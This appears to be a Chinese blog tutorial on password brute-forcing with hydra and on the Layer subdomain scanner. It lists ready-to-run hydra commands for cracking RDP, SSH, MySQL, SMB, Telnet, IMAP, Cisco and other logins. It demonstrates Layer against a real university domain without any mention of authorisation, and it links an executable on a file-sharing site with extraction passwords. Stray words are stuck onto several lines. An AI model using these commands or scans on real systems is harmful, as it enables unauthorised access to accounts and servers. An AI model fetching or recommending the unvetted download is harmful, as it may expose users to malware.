爆破工具

          通過幾天的學習，我學到了一些利用工具進行爆破的工具，因此今天很高興的和你們分享一下。我介紹的爆破工具備兩種：hydra和Layer子域名挖掘機4.2記念版，下面我將介紹怎麼使用這兩種工具及工具的使用語法。php

**1.hydra**

        Hydra是著名黑客組織thc開發的一款開源的暴力密碼破解工具，能夠在線破解多種密碼，目前已經被Backtrack和kali等滲透平臺收錄，hydra 是一個暴力破解工具，主要是針對Linux的。mysql

爆破經常使用語法小結：
-R 繼續從上一次進度接着破解
-S 採用SSL連接
-s PORT 若是非默認端口，可經過這個參數指定
-l LOGIN 小寫，用於指定破解的用戶，對特定用戶破解
-L FILE 大寫，用於指定用戶的用戶名字典
-p PASS 小寫，用於指定密碼破解，少用，通常是採用密碼字典
-P FILE 大寫，用於指定密碼字典
-e ns 額外的選項，n：空密碼試探，s：使用指定帳戶和密碼試探
-C FILE 使用冒號分割格式 例如 「登陸名:密碼」來代替-L/-P參數
破解rdp(3389)： hydra -l administrator -P password.txt -V IP rdp
破解mysql： hydra ip -L 用戶名 -P pass.txt -V mysql
破解ssh： hydra -L user.txt -P password.txt -e ns -vV IP ssh
破解https： hydra -m /index.php -l muts -P pass.txt IP https
破解teamspeak： hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
破解cisco： hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt IP cisco-enable
破解smb： hydra -l administrator -P pass.txt IP smb
破解pop3： hydra -l muts -P pass.txt my.pop3.mail pop3
破解http-proxy： hydra -l admin -P pass.txt http-proxy://IP
破解imap： hydra -L user.txt -p secret IP imap PLAIN
hydra -C defaults.txt -6 imap
破解telnet： hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -Vgit

hydra的安裝
（1）在虛擬機中安裝Kali系統，自帶hydra工具。
（2）在centos系統中安裝hydra工具：
直接使用命令yum install -y hydra
github

實戰：
手動建立用戶名字典和密碼字典，這裏只是爲了演示，只加了幾個用戶名和弱口令。
hydra -l login.txt -P password.txt -M iplist.txt -f -v ssh

綠色的爲爆破成功web

** 2.Layer子域名挖掘機4.2記念版 **

更新內容以下：
一、降級.NET版本至4.0，因以前有人反饋WIN2003沒法使用，由於2003不能安裝.NET4.5，如今win2003及XP均可以正常使用。
二、增長獲取web服務器信息的功能，若是在滲透過程當中，擔憂軟件自動訪問web服務器會記錄到web日誌，能夠關閉獲取WEB服務器信息功能，可是若是幹特別大的壞事，人家仍是能夠經過運營商的渠道來抓你。
三、增長線程控制，因有很多人反饋，開全速的時候，他們的小電腦會卡死，反正我電腦跑起來妥妥的，因此默認設置爲全速。
四、增長右鍵複製所選項，胖子硬提出的需求。
五、修復了一個線程鎖的問題，沒修復前會引發程序崩潰。
小TIPS：爲了適應不一樣的分辨率，首次啓動設置了全屏，可點擊右上角的最大化按鈕復位到我截圖的這個小窗口。sql

百度網盤下載:
連接：http://pan.baidu.com/s/1mh70iIO
提取密碼：nj0x
解壓密碼：www.exehack.netcentos

實戰：
解壓文件

運行Layer.exe文件

在域名的地方輸入nyist.edu.cn，將端口前面的「√」去掉，點啓動

任意點開一個ip,進入，以第一個爲例
服務器